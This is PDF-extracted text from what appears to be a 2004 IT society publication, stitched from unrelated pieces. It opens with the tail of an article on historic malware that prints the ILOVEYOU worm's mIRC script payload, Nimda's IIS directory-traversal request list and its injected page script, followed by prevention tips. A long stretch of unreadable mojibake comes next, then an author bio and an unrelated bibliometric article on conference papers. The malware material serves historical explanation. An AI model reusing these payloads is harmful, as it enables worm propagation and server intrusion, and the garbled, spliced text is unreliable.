scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 26: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

